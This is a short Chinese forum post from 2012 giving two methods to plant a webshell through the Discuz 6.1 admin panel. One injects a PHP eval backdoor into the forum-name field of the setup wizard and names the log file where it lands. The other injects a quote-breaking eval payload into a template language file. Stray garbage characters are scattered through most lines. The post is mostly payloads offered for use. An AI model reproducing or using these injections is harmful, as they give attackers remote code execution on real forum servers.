discuz6.1两种方法后台拿shell2 E& y2 I, C) b" v7 H* J
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下8 Z5 a) \8 ^ {. N( ?
1:# _9 O: r5 L* x& D6 _/ \$ o1 i
http://127.0.0.1/discuz/admincp. ... zard&frames=yes1 U7 G- S$ B1 F" W5 c- o/ Q
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell" S h S+ ]5 z5 b9 w2 n& ~
<?php eval($_POST[cmd]);?>
$ ]$ ]- g8 l& P后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php0 m$ e4 y! x7 h h: |; S* l
) j9 g) o4 A( }6 E- Y
9 `2 f6 ~# N( j- z6 X. M7 O `2:后台模板管理--默认模板套系--详情
% H6 \2 X& j3 w5 K! ttemplates/default/actions.lang.php/ z& r( W3 v4 s" s
jhackj\\');eval($_POST[cmd])?>;//
% I" ]. o( r6 v+ C4 G1 o3 ^( H5 @+ V- d( A8 y' a) ^ J/ _
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对